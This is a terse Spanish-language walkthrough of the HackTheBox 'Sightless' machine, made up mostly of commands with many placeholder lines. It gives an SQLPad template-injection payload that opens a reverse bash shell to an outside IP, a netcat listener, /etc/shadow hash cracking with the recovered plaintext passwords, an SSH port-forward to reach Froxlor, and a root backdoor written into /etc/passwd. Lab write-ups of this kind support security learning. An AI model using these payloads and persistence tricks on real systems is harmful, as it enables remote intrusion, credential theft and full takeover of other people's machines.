Sightless

Sightless


HTB Linux

nmap -A -p- -oA sightless 10.129.231.103 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA sightless 10.129.231.103

echo "10.129.231.103 sightless.htb sqlpad.sightless.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA sightless-udp 10.129.231.103

ping -c 1 10.129.231.103

ssh_command.

nmap -p- --open -T5 -v -n 10.129.231.103

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.231.103 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p21,22,80 10.129.231.103 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://sightless.htb

ssh_command.

ssh_command.

Nos dirigimos al servicio de sqlpad

ssh_command.

Podemos ver una explicacion de como atacar a esta aplicacion

https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

Ponemos lo siguiente en Database:

{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.37/443 0>&1"') }}

ssh_command.

ssh_command.

nc -lvnp 443

ssh_command.

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash

cat /etc/shadow

ssh_command.

Crackeamos la contrasena

hashcat -m 1800 '$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/' /usr/share/wordlist/rockyou.txt

Vemos que la contrasena para michael Credenciales -> michael:insaneclownposse

ssh michael@sightless.htb

ssh_command.

find \ -perm -4000 2>/dev/null

sudo -l

ssh_command.

getcap -r / 2>/dev/null

ps -faux

ssh_command.

cat /etc/apache2/sites-enabled/000-default.conf | grep -v '#'

ssh_command.

Vemos que tenemos algo en el puerto 8080

ss -tln

ssh_command.

sshpass -p 'insaneclownposse' ssh michael@sightless.htb -L 8081:127.0.0.1:8080

ssh_command.

Nos dirigimos a http://127.0.0.1:8081

ssh_command.

Vemos que le falta admin a la pagina

ssh_command.

Agregamos lo siugiente a /etc/hosts por este momento

ssh_command.

Nos dirigimos a http://admin.sightless.htb:8081/

ssh_command.

Las credenciales de michael no me funcionan

Trate con ftp y no tuve suerte igual.

ftp anonymous@sightless.htb

ssh_command.

sudo apt install lftp

ssh_command.

Hacemos unos cambios al payload.txt y abrimos burpsuite

Podemos leer algo de froxlor

https://github.com/froxlor/Froxlor/security/advisories/GHSA-x525-54hf-xr53

ssh_command.

Nos dirigimos a Admin y vemos el nuevo usuario

ssh_command.

Cambiamos la contrasena

ssh_command.

Nos dirigimos a chrome://inspect/#devices

ssh_command.

Nos vamos a la pestana de Network y vemos las siguiente credenciales

admin:ForlorfroxAdmin

ssh_command.

echo "echo 'cu3rv0x::0:0:cu3rv0x:/root:/bin/bash' >> /etc/passwd" rev.sh

ssh_command.

Cambiamos el comando de reinicio y el directorio de php-fpm

ssh_command.

cat /root/root.txt

ssh_command.

© 2025 Cu3rv0x